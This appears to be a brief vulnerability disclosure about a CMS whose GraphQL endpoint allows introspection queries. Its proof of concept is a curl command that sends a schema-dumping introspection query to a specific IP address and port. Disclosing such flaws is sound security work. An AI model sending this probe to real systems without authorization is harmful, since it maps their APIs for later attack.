# summary The GraphQL feature of this CMS system enables Introspection Queries, which allows any attacker to carry out Introspection Query attacks and thereby disclose the capabilities of the target GraphQL API. --- # POC ``` curl -X POST -H "User-Agent: oxpecker" -H "Accept-Encoding: gzip, deflate" -H "Accept: */*" -H "Connection: keep-alive" -H "Content-Length: 94" -H "Content-Type: application/json" -d '{"query": "query cop { __schema { types { name fields { name } } } }", "operationName": "cop"}' 'http://34.127.101.91:40410/graphql' ``` ---